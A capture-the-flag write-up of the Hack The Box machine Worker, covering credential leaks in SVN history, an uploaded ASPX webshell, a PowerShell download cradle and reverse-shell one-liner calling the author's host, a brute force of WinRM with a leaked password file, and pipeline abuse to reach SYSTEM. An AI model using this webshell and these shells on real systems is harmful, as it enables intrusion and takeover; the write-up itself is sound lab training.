Links

HTB - Worker

Zweilosec's writeup of the medium-difficulty Windows machine Worker from https://hackthebox.eu

Overview

Short description to include any strange things to be dealt with
TODO: Finish writing and clean up

Useful Skills and Tools

Interactive Windows Command/Tool List

WADComs is an interactive cheat sheet, containing a curated list of offensive security tools and their respective commands, to be used against Windows/AD environments.

Useful thing 2

  • description with generic example

Enumeration

Nmap scan

I started my enumeration with an nmap scan of 10.10.10.203. The options I regularly use are: -p-, which is a shortcut which tells nmap to scan all ports, -sC is the equivalent to --script=default and runs a collection of nmap enumeration scripts against the target, -sV does a service scan, and -oA <name> saves the output with a filename of <name>.
┌──(zweilos㉿kali)-[~/htb/worker]
└─$ nmap -sCV -n -p- -v 10.10.10.203
Starting Nmap 7.91 ( https://nmap.org ) at 2020-11-28 18:40 EST
NSE: Loaded 153 scripts for scanning.
NSE: Script Pre-scanning.
Initiating NSE at 18:40
Completed NSE at 18:40, 0.00s elapsed
Initiating NSE at 18:40
Completed NSE at 18:40, 0.00s elapsed
Initiating NSE at 18:40
Completed NSE at 18:40, 0.00s elapsed
Initiating Ping Scan at 18:40
Scanning 10.10.10.203 [2 ports]
Completed Ping Scan at 18:40, 0.06s elapsed (1 total hosts)
Initiating Connect Scan at 18:40
Scanning 10.10.10.203 [65535 ports]
Discovered open port 80/tcp on 10.10.10.203
Connect Scan Timing: About 18.58% done; ETC: 18:42 (0:02:16 remaining)
Connect Scan Timing: About 46.95% done; ETC: 18:42 (0:01:09 remaining)
Discovered open port 5985/tcp on 10.10.10.203
Discovered open port 3690/tcp on 10.10.10.203
Completed Connect Scan at 18:41, 105.47s elapsed (65535 total ports)
Initiating Service scan at 18:41
Scanning 3 services on 10.10.10.203
Completed Service scan at 18:42, 6.09s elapsed (3 services on 1 host)
NSE: Script scanning 10.10.10.203.
Initiating NSE at 18:42
Completed NSE at 18:42, 1.01s elapsed
Initiating NSE at 18:42
Completed NSE at 18:42, 0.20s elapsed
Initiating NSE at 18:42
Completed NSE at 18:42, 0.00s elapsed
Nmap scan report for 10.10.10.203
Host is up (0.044s latency).
Not shown: 65532 filtered ports
PORT STATE SERVICE VERSION
80/tcp open http Microsoft IIS httpd 10.0
| http-methods:
| Supported Methods: OPTIONS TRACE GET HEAD POST
|_ Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
|_http-title: IIS Windows Server
3690/tcp open svnserve Subversion
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
NSE: Script Post-scanning.
Initiating NSE at 18:42
Completed NSE at 18:42, 0.00s elapsed
Initiating NSE at 18:42
Completed NSE at 18:42, 0.00s elapsed
Initiating NSE at 18:42
Completed NSE at 18:42, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 113.30 seconds
3 ports open: 80 - HTTP, 3690 - Subversion, and 5985 - Presumably WinRM

Port 80 - HTTP

nothing but default IIS on port 80, dirbuster revealed nothing of use

Port 3690 - Subversion

To get a working copy, you must check out some subtree of the repository. (The term check out may sound like it has something todo with locking or reserving resources, but it doesn't; it simply creates a working copy of the project for you.) For example, if you check out /calc, you will get a working copy like this: $ svn checkout http://svn.example.com/repos/calcA calc/MakefileA calc/integer.cA calc/button.cChecked out revision 56.
installed subversion sudo apt install subversion
┌──(zweilos㉿kali)-[~/htb/worker]
└─$ svn checkout http://10.10.10.203
svn: E170013: Unable to connect to a repository at URL 'http://10.10.10.203'
svn: E175003: The server at 'http://10.10.10.203' does not support the HTTP/DAV protocol
Was not able to connect the to page as HTTP, but after some reading found that there is a SVN:// protocol.
┌──(zweilos㉿kali)-[~/htb/worker]
└─$ svn checkout svn://10.10.10.203
A dimension.worker.htb
A dimension.worker.htb/LICENSE.txt
A dimension.worker.htb/README.txt
A dimension.worker.htb/assets
A dimension.worker.htb/assets/css
A dimension.worker.htb/assets/css/fontawesome-all.min.css
A dimension.worker.htb/assets/css/main.css
A dimension.worker.htb/assets/css/noscript.css
A dimension.worker.htb/assets/js
A dimension.worker.htb/assets/js/breakpoints.min.js
A dimension.worker.htb/assets/js/browser.min.js
A dimension.worker.htb/assets/js/jquery.min.js
A dimension.worker.htb/assets/js/main.js
A dimension.worker.htb/assets/js/util.js
A dimension.worker.htb/assets/sass
A dimension.worker.htb/assets/sass/base
A dimension.worker.htb/assets/sass/base/_page.scss
A dimension.worker.htb/assets/sass/base/_reset.scss
A dimension.worker.htb/assets/sass/base/_typography.scss
A dimension.worker.htb/assets/sass/components
A dimension.worker.htb/assets/sass/components/_actions.scss
A dimension.worker.htb/assets/sass/components/_box.scss
A dimension.worker.htb/assets/sass/components/_button.scss
A dimension.worker.htb/assets/sass/components/_form.scss
A dimension.worker.htb/assets/sass/components/_icon.scss
A dimension.worker.htb/assets/sass/components/_icons.scss
A dimension.worker.htb/assets/sass/components/_image.scss
A dimension.worker.htb/assets/sass/components/_list.scss
A dimension.worker.htb/assets/sass/components/_table.scss
A dimension.worker.htb/assets/sass/layout
A dimension.worker.htb/assets/sass/layout/_bg.scss
A dimension.worker.htb/assets/sass/layout/_footer.scss
A dimension.worker.htb/assets/sass/layout/_header.scss
A dimension.worker.htb/assets/sass/layout/_main.scss
A dimension.worker.htb/assets/sass/layout/_wrapper.scss
A dimension.worker.htb/assets/sass/libs
A dimension.worker.htb/assets/sass/libs/_breakpoints.scss
A dimension.worker.htb/assets/sass/libs/_functions.scss
A dimension.worker.htb/assets/sass/libs/_mixins.scss
A dimension.worker.htb/assets/sass/libs/_vars.scss
A dimension.worker.htb/assets/sass/libs/_vendor.scss
A dimension.worker.htb/assets/sass/main.scss
A dimension.worker.htb/assets/sass/noscript.scss
A dimension.worker.htb/assets/webfonts
A dimension.worker.htb/assets/webfonts/fa-brands-400.eot
A dimension.worker.htb/assets/webfonts/fa-brands-400.svg
A dimension.worker.htb/assets/webfonts/fa-brands-400.ttf
A dimension.worker.htb/assets/webfonts/fa-brands-400.woff
A dimension.worker.htb/assets/webfonts/fa-brands-400.woff2
A dimension.worker.htb/assets/webfonts/fa-regular-400.eot
A dimension.worker.htb/assets/webfonts/fa-regular-400.svg
A dimension.worker.htb/assets/webfonts/fa-regular-400.ttf
A dimension.worker.htb/assets/webfonts/fa-regular-400.woff
A dimension.worker.htb/assets/webfonts/fa-regular-400.woff2
A dimension.worker.htb/assets/webfonts/fa-solid-900.eot
A dimension.worker.htb/assets/webfonts/fa-solid-900.svg
A dimension.worker.htb/assets/webfonts/fa-solid-900.ttf
A dimension.worker.htb/assets/webfonts/fa-solid-900.woff
A dimension.worker.htb/assets/webfonts/fa-solid-900.woff2
A dimension.worker.htb/images
A dimension.worker.htb/images/bg.jpg
A dimension.worker.htb/images/overlay.png
A dimension.worker.htb/images/pic01.jpg
A dimension.worker.htb/images/pic02.jpg
A dimension.worker.htb/images/pic03.jpg
A dimension.worker.htb/index.html
A moved.txt
Checked out revision 5.
there were quite a few files here, and a subdomain dimension.worker.htb. I added worker.htb and dimension.worker.htb to my hosts file
This repository has been migrated and will no longer be maintaned here.
You can find the latest version at: http://devops.worker.htb
// The Worker team :)
The file moved.txt contained a message stating that the repo has been moved to another castle devops.worker.htb. I added this one to my hosts file as well
<!-- Work -->
<article id="work">
<h2 class="major">Work</h2>
<span class="image main"><img src="images/pic02.jpg" alt="" /></span>
<p>Curios on what we're currently working on are you? Well let's please you with a couple of teasers.</p>
<a href="http://alpha.worker.htb/">Alpha</a><p>This is our first page</p>
<a href="http://cartoon.worker.htb/">Cartoon</a><p>When we're not working we enjoy watching cartoons. Guess who in our team is what cartoon character!</p>
<a href="http://lens.worker.htb/">Lens</a><p>This page is for you 40+:ers. Can you read it?</p>
<a href="http://solid-state.worker.htb/">Solid State</a><p>We save our data in our datacenter on blazing fast solid-state storage.</p>
<a href="http://spectral.worker.htb/">Spectral</a><p>Sounds almost like one of our favourite agents movies, but we also enjoy Hamilton</p>
<a href="http://story.worker.htb/">Story</a><p>Lets make a long story short, end of story</p>
The file index.html contained another list of subdomains; again added to hosts
Worker homepage using dimension theme
Links to other pages
Cartoon character page, possible usernames? The other pages did not contain anything that looked useful, so moved on to the devops domain I found earlier.
The devops page required authentication
┌──(zweilos㉿kali)-[~/htb/worker/devops]
└─$ svn log svn://devops.worker.htb
------------------------------------------------------------------------
r5 | nathen | 2020-06-20 09:52:00 -0400 (Sat, 20 Jun 2020) | 1 line
Added note that repo has been migrated
------------------------------------------------------------------------
r4 | nathen | 2020-06-20 09:50:20 -0400 (Sat, 20 Jun 2020) | 1 line
Moving this repo to our new devops server which will handle the deployment for us
------------------------------------------------------------------------
r3 | nathen | 2020-06-20 09:46:19 -0400 (Sat, 20 Jun 2020) | 1 line
-
------------------------------------------------------------------------
r2 | nathen | 2020-06-20 09:45:16 -0400 (Sat, 20 Jun 2020) | 1 line
Added deployment script
------------------------------------------------------------------------
r1 | nathen | 2020-06-20 09:43:43 -0400 (Sat, 20 Jun 2020) | 1 line
First version
------------------------------------------------------------------------
Next, I used the log command and found the commit notes that described some of the progress that had been made on the repository.
┌──(zweilos㉿kali)-[~/htb/worker/devops]
└─$ svn diff -r 1 1 ⨯
Index: moved.txt
===================================================================
--- moved.txt (nonexistent)
+++ moved.txt (revision 5)
@@ -0,0 +1,5 @@
+This repository has been migrated and will no longer be maintaned here.
+You can find the latest version at: http://devops.worker.htb
+
+// The Worker team :)
+
┌──(zweilos㉿kali)-[~/htb/worker/devops]
└─$ svn diff -r 2
Index: deploy.ps1
===================================================================
--- deploy.ps1 (revision 2)
+++ deploy.ps1 (nonexistent)
@@ -1,6 +0,0 @@
-$user = "nathen"
-$plain = "wendel98"
-$pwd = ($plain | ConvertTo-SecureString)
-$Credential = New-Object System.Management.Automation.PSCredential $user, $pwd
-$args = "Copy-Site.ps1"
-Start-Process powershell.exe -Credential $Credential -ArgumentList ("-file $args")
Index: moved.txt
===================================================================
--- moved.txt (nonexistent)
+++ moved.txt (revision 5)
@@ -0,0 +1,5 @@
+This repository has been migrated and will no longer be maintaned here.
+You can find the latest version at: http://devops.worker.htb
+
+// The Worker team :)
+
┌──(zweilos㉿kali)-[~/htb/worker/devops]
└─$ svn diff -r 3
Index: deploy.ps1
===================================================================
--- deploy.ps1 (revision 3)
+++ deploy.ps1 (nonexistent)
@@ -1,7 +0,0 @@
-$user = "nathen"
-# NOTE: We cant have my password here!!!
-$plain = ""
-$pwd = ($plain | ConvertTo-SecureString)
-$Credential = New-Object System.Management.Automation.PSCredential $user, $pwd
-$args = "Copy-Site.ps1"
-Start-Process powershell.exe -Credential $Credential -ArgumentList ("-file $args")
\ No newline at end of file
Index: moved.txt
===================================================================
--- moved.txt (nonexistent)
+++ moved.txt (revision 5)
@@ -0,0 +1,5 @@
+This repository has been migrated and will no longer be maintaned here.
+You can find the latest version at: http://devops.worker.htb
+
+// The Worker team :)
+
┌──(zweilos㉿kali)-[~/htb/worker/devops]
└─$ svn diff -r 4
Index: moved.txt
===================================================================
--- moved.txt (nonexistent)
+++ moved.txt (revision 5)
@@ -0,0 +1,5 @@
+This repository has been migrated and will no longer be maintaned here.
+You can find the latest version at: http://devops.worker.htb
+
+// The Worker team :)
+
┌──(zweilos㉿kali)-[~/htb/worker/devops]
└─$ svn diff -r 5
I checked the changes that had been made in each revision, and found that at one point a username and password had been hardcoded in the file deploy.ps1
-$user = "nathen"
-$plain = "wendel98"
This credential set did not work for logging into the devops page, nor for WinRM. After getting no progress for awhile, I reset the box and the login worked for the devops page, still not for WinRM

The Azure DevOps Portal

After logging in, I found myself in a Azure DevOps portal as the user named ekenas.
When I clicked on the profile picture, I found the user's name and domain login information.
I checked through the user's settings, but there wasn't anything useful.
Under the ekenas repository, there was a project for something called SmartHotel360
Under the Members section of the project I found icons for 2 other users.
template for a page?
Under SmartHotel360 there was a mostly empty project called w45ty45t.
In all, found 3 usernames, and a possible password w45ty45t

Crafting an .aspx reverse shell

None of the usernames or potential passwords got me anywhere, so I began to look closer at what I was able to do in the SmartHotel360 repository.
lots of screenshots -> description - had to: 1. create new branch 2. upload file to new branch 3. add work item to commit 4. approve commit 5. wait for build to complete 6. merge with master 7. navigate to webshell
TF402455: Pushes to this branch are not permitted; you must use a pull request to update this branch.
Tried to push a file uploaded through the web portal but got the above message
Tried creating a new branch of the project called test.
The build takes so long that the cleanup takes place too quickly to do anything... (I think I must have finished creating my test branch just before the cleanup script or whatever cleared it the first time I did this)
Next I created a new pull request, trying to upload an .aspx file to see if I could get code execution.
<%@ Page Language="C#" Debug="true" Trace="false" %>
<%@ Import Namespace="System.Diagnostics" %>
<%@ Import Namespace="System.IO" %>
<script Language="c#" runat="server">
void Page_Load(object sender, EventArgs e)
{
}
string ExcuteCmd(string arg)
{
ProcessStartInfo psi = new ProcessStartInfo();
psi.FileName = "cmd.exe";
psi.Arguments = "/c "+arg;
psi.RedirectStandardOutput = true;
psi.UseShellExecute = false;
Process p = Process.Start(psi);
StreamReader stmrdr = p.StandardOutput;
string s = stmrdr.ReadToEnd();
stmrdr.Close();
return s;
}
void cmdExe_Click(object sender, System.EventArgs e)
{
Response.Write("<pre>");
Response.Write(Server.HtmlEncode(ExcuteCmd(txtArg.Text)));
Response.Write("</pre>");
}
</script>
<HTML>
<HEAD>
<title>awen asp.net webshell</title>
</HEAD>
<body >
<form id="cmd" method="post" runat="server">
<asp:TextBox id="txtArg" style="Z-INDEX: 101; LEFT: 405px; POSITION: absolute; TOP: 20px" runat="server" Width="250px"></asp:TextBox>
<asp:Button id="testing" style="Z-INDEX: 102; LEFT: 675px; POSITION: absolute; TOP: 18px" runat="server" Text="excute" OnClick="cmdExe_Click"></asp:Button>
<asp:Label id="lblText" style="Z-INDEX: 103; LEFT: 310px; POSITION: absolute; TOP: 22px" runat="server">Command:</asp:Label>
</form>
</body>
</HTML>
<!-- Contributed by Dominic Chell (http://digitalapocalypse.blogspot.com/) -->
<!-- http://michaeldaw.org 04/2007 -->
The asp.net webshell by Dominic Chell, downloaded from https://github.com/tennc/webshell/blob/master/fuzzdb-webshell/asp/cmdasp.aspx.
After I submitted the pull request I had to approve it. Luckily this user had the necessary permissions.
Approved the file pull request and completed it. If you have problems, make sure to check the Policies section on the right, as it does checks that have to be met first.
My test branches were deleted multiple times before I figured out the rhythm of the portal and how to do everything.
Tried to access my web shell, but it said it wasn't there...
Next I merged my test branch into the master
After a lot of trial and error, I was able to upload my webshell, and tried to run a reverse shell script from my attack machine.
powershell -c "IEX(New-Object System.Net.WebClient).DownloadString('http://10.10.15.98:8909/revShell.ps1')"
Put this command into the webshell input as a stager to get my reverse shell powershell script from my waiting python http server
┌──(zweilos㉿kali)-[~/htb/worker]
└─$ python3 -m http.server 8909
Serving HTTP on 0.0.0.0 port 8909 (http://0.0.0.0:8909/) ...
10.10.10.203 - - [12/Dec/2020 17:35:03] "GET /revShell.ps1 HTTP/1.1" 200 -
got connection to my waiting webserver which hosted a reverse shell ps1 script
$client = New-Object System.Net.Sockets.TCPClient("10.10.15.98",8099);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()
My PowerShell script consisted of a reverse shell one-liner found on https://gist.github.com/egre55/c058744a4240af6515eb32b2d33fbed3#gistcomment-3391254

Initial Foothold

┌──(zweilos㉿kali)-[~/htb/worker]
└─$ script 1 ⨯
Script started, output log file is 'typescript'.
┌──(zweilos㉿kali)-[~/htb/worker]
└─$ nc -lvnp 8099
listening on [any] 8099 ...
connect to [10.10.15.98] from (UNKNOWN) [10.10.10.203] 50339
whoami /all
USER INFORMATION
----------------
User Name SID
========================== =============================================================
iis apppool\defaultapppool S-1-5-82-3006700770-424185619-1745488364-794895919-4004696415
GROUP INFORMATION
-----------------
Group Name Type SID Attributes
==================================== ================ ============ ==================================================
Mandatory Label\High Mandatory Level Label S-1-16-12288
Everyone Well-known group S-1-1-0 Mandatory group, Enabled by default, Enabled group
BUILTIN\Users Alias S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\SERVICE Well-known group S-1-5-6 Mandatory group, Enabled by default, Enabled group
CONSOLE LOGON Well-known group S-1-2-1 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users Well-known group S-1-5-11 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization Well-known group S-1-5-15 Mandatory group, Enabled by default, Enabled group
BUILTIN\IIS_IUSRS Alias S-1-5-32-568 Mandatory group, Enabled by default, Enabled group
LOCAL Well-known group S-1-2-0 Mandatory group, Enabled by default, Enabled group
Unknown SID type S-1-5-82-0 Mandatory group, Enabled by default, Enabled group
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= ========================================= ========
SeAssignPrimaryTokenPrivilege Replace a process level token Disabled
SeIncreaseQuotaPrivilege Adjust memory quotas for a process Disabled
SeAuditPrivilege Generate security audits Disabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeImpersonatePrivilege Impersonate a client after authentication Enabled
SeCreateGlobalPrivilege Create global objects Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Disabled
PS C:\windows\system32\inetsrv>
I was able to get a reverse shell after uploading and running my PowerShell script!
I was logged in as the service account iis apppool\defaultapppool. SeImpersonatePrivilege sounded interesting

Road to User

Further enumeration

PS C:\windows\system32\inetsrv> net user
User accounts for \\
-------------------------------------------------------------------------------
aaralf abrall aceals
adaama Administrator aidang
ainann alaann aleapp
alearb alearm aliart
aliaru alkash alpast
alyath alyath1 amaauc
amaave amaayr ancbal
andbal andbal1 andogi
angbal angban aniban
annbar annbar1 antbar
aribar aribar1 aribar2
armbar ashbea ashbea1
ashbec audbec audbed
aurbee autbel baibel
baiben beaber becbet
belbev benbev bevbig
biabil blabin brabin
brabir brabir1 brebla
brebla1 bribla briblo
bribog brobol brobol1
brobon cadbos caibou
calbou calboy calbra
cambra cambra1 carbre
carbre1 carbre2 carbri
carbri1 carbri2 carbri3
carbri4 carbro casbro
casbro1 casbro2 catbro
ceabro chabro chabry
chabuc chebuc chebuc1
chebuc2 chlbud chrbun
chrbur chrbur1 ciebur
clabur codbur colbur
colbur1 conbur conbus
corbut coubux coucad
daical dakcal dakcar
damcar dancar dancaw
dancax darcay darcha
davcha dawcha DefaultAccount
descha descha1 devche
devche1 domche dreche
drechi drechi1 dulchu
duscla dylcla eglcla
elacle elicli elicli1
eloclu emecob emecob1
emicoc emlcoc emlcof
emmcog ericol ericol1
ericol2 estcol ethcol
evacol fabcon faicon
fracon gabcoo gabcor
garcor gavcor gercor
gidcot gilcou giocov
glecra gracra gracra1
Guest guycro hancro
hancro1 harcul haycum
haycun heacup heldag
herdal holdal hondan
hopdar iandav indde
iridea isaden isader
jacdev jacdev1 jaddig
jaidin jamd'o jamdol
jandol jandor jardud
jasdum jasdun jaydun
jazdun jendun jerdup
jesdur jesdur1 jesdur2
jesdut joddyk jodeas
johebe johock jonedg
jonelp jonely josemm
josesh joseto judeur
juleve jusewe kadfai
kalfal karfal kasfan
katfar katfay katfel
katfer kayfif keafif
keafil keefla keifle
keifli kelfoo kelfor
kelfor1 kelfos kenfot
kenfot1 kenfot2 keofre
kerfro kerful khaful
kiogan kirgar kirgar1
kodgar kylgas lacgav
langet langih laugil
laugir lavgir leigla
leigle leigli lesglo
lesgoa levgor liagou
liagra lingra lingre
lyngri machad machai
madhal madhal1 maehal
makhal makham makham1
malham malhan malhan1
marhar marhar1 mathar
mauhar mayhar meghar
melhas melhas1 michat
michat1 mikhat mirhat
morhav morhay nadhed
naohed nathel nathen
nather nather1 neihey
nichin nichin1 noahip
nuahip oakhol o'bhol
owehol paihol parhol
parhol1 pathop pauhor
payhos perhou peyhou
phihou quehub quihud
rachul raehun ramhun
ranhut rebhyd reeinc
reeing reiing renipr
restorer rhiire riairv
ricisa robish robisl
robive ronkay rubkei
rupkel ryakel sabken
samken sapket sarkil
sarkil1 scakin scokin
seakin seckir shakir
shakir1 shakir2 shekno
shikyl sielac skylan
skylan1 slolay slolec
solleg soplel stelev
sutlew tallew tamley
tanlin tanlin1 taylin
taylin1 taylin2 teslip
teslis theliv tholon
timlud timman todman
tremar tremas tremay
trimay trimea trimed
tylmer vanmey vanmid
vanmid1 vanmil waymor
WDAGUtilityAccount vedmil vermil
wesmos wesmox whimun
whimun1 whinai wianan
vicmil vicmof vicmon
wilnee wilnew vinmon
virmor wyanis xavnog
xennor xzynor zacnor
zacnor1 zagnor zeonor
zitnot zoeoak
The command completed with one or more errors.
net user showed a very long list of usernames
PS C:\windows\system32\inetsrv> ls \users
Directory: C:\users
Mode LastWriteTime Length Name
---- ------------- ------ ----
d----- 2020-03-28 14:59 .NET v4.5
d----- 2020-03-28 14:59 .NET v4.5 Classic
d----- 2020-08-18 00:33 Administrator
d-r--- 2020-03-28 14:01 Public
d----- 2020-07-22 01:11 restorer
d----- 2020-07-08 19:22 robisl
however there were only three user folder: robisl, restorer, and Administrator
PS C:\users\restorer> get-psdrive -psprovider filesystem
Name Used (GB) Free (GB) Provider Root CurrentLocation
---- --------- --------- -------- ---- ---------------
C 19,66 9,74 FileSystem C:\ users\restorer
W 2,52 17,48 FileSystem W:\
There was a second logical disk attached to the machine
PS W:\> ls
Directory: W:\
Mode LastWriteTime Length Name
---- ------------- ------ ----
d----- 2020-06-16 18:59 agents
d----- 2020-03-28 14:57 AzureDevOpsData
d----- 2020-04-03 11:31 sites
d----- 2020-06-20 16:04 svnrepos
It looked like this is where the svn repos were stored
PS W:\> tree sites
Folder PATH listing for volume Work
Volume serial number is E82A-AEA8
W:\SITES
????alpha.worker.htb
? ????assets
? ? ????css
? ? ? ????images
? ? ????js
? ? ????sass
? ? ? ????libs
? ? ????webfonts
? ????images
????cartoon.worker.htb
? ????css
? ? ????ie
? ? ????images
? ????fonts
? ????images
? ????js
????dimension.worker.htb
? ????assets
? ? ????css
? ? ????js
? ? ????sass
? ? ? ????base
? ? ? ????components
? ? ? ????layout
? ? ? ????libs
? ? ????webfonts
? ????images
????lens.worker.htb
? ????assets
? ? ????css
? ? ? ????images
? ? ????js
? ? ????sass
? ? ? ????base
? ? ? ????components
? ? ? ????layout
? ? ? ????libs
? ? ????webfonts
? ????images
? ????fulls
? ????thumbs
????solid-state.worker.htb
? ????assets
? ? ????css
? ? ? ????images
? ? ????js
? ? ????sass
? ? ? ????base
? ? ? ????components
? ? ? ????layout
? ? ? ????libs
? ? ????webfonts
? ????images
????spectral.worker.htb
? ????assets
? ? ????css
? ? ? ????images
? ? ????js
? ? ????sass
? ? ? ????libs
? ? ????webfonts
? ????images
????story.worker.htb
? ????assets
? ? ????css
? ? ????js
? ? ????sass
? ? ? ????base
? ? ? ????components
? ? ? ????layout
? ? ? ????libs
? ? ????webfonts
? ????images
? ????gallery
? ????fulls
? ????thumbs
????twenty.worker.htb
????assets
? ????css
? ? ????images
? ????js
? ????sass
? ? ????libs
? ????webfonts
????images
I found the data for the websites in the sites folder,
PS W:\> tree /F svnrepos
Folder PATH listing for volume Work
Volume serial number is E82A-AEA8
W:\SVNREPOS
????www
? format
? README.txt
?
????conf
? authz
? hooks-env.tmpl
? passwd
? svnserve.conf
?
????db
? ? current
? ? format
? ? fs-type
? ? fsfs.conf
? ? min-unpacked-rev
? ? rep-cache.db
? ? rep-cache.db-journal
? ? txn-current
? ? txn-current-lock
? ? uuid
? ? write-lock
? ?
? ????revprops
? ? ????0
? ? 0
? ? 1
? ? 2
? ? 3
? ? 4
? ? 5
? ?
? ????revs
? ? ????0
? ? 0
? ? 1
? ? 2
? ? 3
? ? 4
? ? 5
? ?
? ????transactions
? ????txn-protorevs
????hooks
? post-commit.tmpl
? post-lock.tmpl
? post-revprop-change.tmpl
? post-unlock.tmpl
? pre-commit.tmpl
? pre-lock.tmpl
? pre-revprop-change.tmpl
? pre-unlock.tmpl
? start-commit.tmpl
?
????locks
db-logs.lock
db.lock
That passwd file in W:\svnrepos\www\conf\ looked interesting

Finding user creds

PS W:\svnrepos\www\conf> cat passwd
### This file is an example password file for svnserve.
### Its format is similar to that of svnserve.conf. As shown in the
### example below it contains one section labelled [users].
### The name and password for each user follow, one account per line.
[users]
nathen = wendel98
nichin = fqerfqerf
nichin = asifhiefh
noahip = player
nuahip = wkjdnw
oakhol = bxwdjhcue
owehol = supersecret
paihol = painfulcode
parhol = gitcommit
pathop = iliketomoveit
pauhor = nowayjose
payhos = icanjive
perhou = elvisisalive
peyhou = ineedvacation
phihou = pokemon
quehub = pickme
quihud = kindasecure
rachul = guesswho
raehun = idontknow
ramhun = thisis
ranhut = getting
rebhyd = rediculous
reeinc = iagree
reeing = tosomepoint
reiing = isthisenough
renipr = dummy
rhiire = users
riairv = canyou
ricisa = seewhich
robish = onesare
robisl = wolves11
robive = andwhich
ronkay = onesare
rubkei = the
rupkel = sheeps
ryakel = imtired
sabken = drjones
samken = aqua
sapket = hamburger
sarkil = friday
In the folder W:\svnrepos\www\conf there was a file passwd that contained a list of usernames and passwords. This looked like a good time to brute force WinRM

Port 5985 - WinRM

used winrm-brute to cycle through the list of usernames and passwords
[SUCCESS] user: robisl password: wolves11
Retrieved the password for one of the users robisl
┌──(zweilos㉿kali)-[~/htb/worker/winrm-brute]
└─$ evil-winrm -u robisl -p wolves11 -i 10.10.10.203
Evil-WinRM shell v2.3
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\robisl\Documents> whoami /all
USER INFORMATION
----------------
User Name SID
============= ==============================================
worker\robisl S-1-5-21-3082756831-2119193761-3468718151-1330
GROUP INFORMATION
-----------------
Group Name Type SID Attributes
====================================== ================ ============================================== ==================================================
Everyone Well-known group S-1-1-0 Mandatory group, Enabled by default, Enabled group
WORKER\Production Alias S-1-5-21-3082756831-2119193761-3468718151-1018 Mandatory group, Enabled by default, Enabled group
BUILTIN\Remote Management Users Alias S-1-5-32-580 Mandatory group, Enabled by default, Enabled group
BUILTIN\Users Alias S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NETWORK Well-known group S-1-5-2 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users Well-known group S-1-5-11 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization Well-known group S-1-5-15 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Local account Well-known group S-1-5-113 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NTLM Authentication Well-known group S-1-5-64-10 Mandatory group, Enabled by default, Enabled group
Mandatory Label\Medium Mandatory Level Label S-1-16-8192
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= ============================== =======
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled
Using evil-winrm I was able to login with the password specified for robisl

User.txt

*Evil-WinRM* PS C:\Users\robisl\Documents> cd ../Desktop
*Evil-WinRM* PS C:\Users\robisl\Desktop> ls
Directory: C:\Users\robisl\Desktop
Mode LastWriteTime Length Name
---- ------------- ------ ----
-ar--- 12/12/2020 10:16 PM 34 user.txt
*Evil-WinRM* PS C:\Users\robisl\Desktop> cat user.txt
6266c82c4a400539708519fd31eb2a34
On the user's desktop I found the user.txt flag

Path to Power (Gaining Administrator Access)

Enumeration as robisl

After searching high and low and enumerating as much as I could, I didn't find anything useful.
I tried to switch users to robisl in the devops portal.
I tried switching users in the devops page I had open, but received an error message saying that this user did not have the permissions needed to view project-level information.
I decided to try robisl's credentials on a fresh devops page after closing it and clearing my cache, and was happy to see that I was logged in to a different project.
Azure Pipelines provides a quick, easy, and safe way to automate building your projects and making them available to users.
This sounds like a good way to try to get code execution...I wonder if there is a way to run it in the context of Administrator? I put some code in the azure-pipelines.yml that I hoped would execute and download my reverse shell script.
Unfortunately this did not work. After doing even more reading, I found that I had to assign an agent from the pool to build the project.
Agetnt pool selection
Assign the job to the agent
Save and run
The build job was started
The job built successfully, but my script failed to run. I checked my syntax on everything and made sure I did all of the proper steps and tried again.
Unfortunately I don't remember exactly what I had done wrong, or how I fixed it (I need to take more detailed notes, I guess!). However, after a lot of trial and error, I was able to get the project to build and also execute my script. No I hoped that it would actually execute the PowerShell script and send me a reverse shell!
New Pipeline - Azure Repos Git - PartsUnlimited - Starter Pipeline
┌──(zweilos㉿kali)-[~/htb/worker]
└─$ python3 -m http.server 8909
Serving HTTP on 0.0.0.0 port 8909 (http://0.0.0.0:8909/) ...
10.10.10.203 - - [12/Dec/2020 20:32:32] "GET /revShell.ps1 HTTP/1.1" 200 -
My waiting python HTTP server got a connection request, and I could see that it sent the script.

Getting a shell

┌──(zweilos㉿kali)-[~/htb/worker]
└─$ nc -lvnp 8099 1 ⨯
listening on [any] 8099 ...
connect to [10.10.15.98] from (UNKNOWN) [10.10.10.203] 51544
PS W:\agents\agent11\_work\8\s> whoami /all
USER INFORMATION
----------------
User Name SID
=================== ========
nt authority\system S-1-5-18
GROUP INFORMATION
-----------------
Group Name Type SID Attributes
====================================== ================ ============================================== ==================================================
Mandatory Label\System Mandatory Level Label S-1-16-16384
Everyone Well-known group S-1-1-0 Mandatory group, Enabled by default, Enabled group
WORKER\VSTS_AgentService_G5f35d Alias S-1-5-21-3082756831-2119193761-3468718151-1419 Mandatory group, Enabled by default, Enabled group
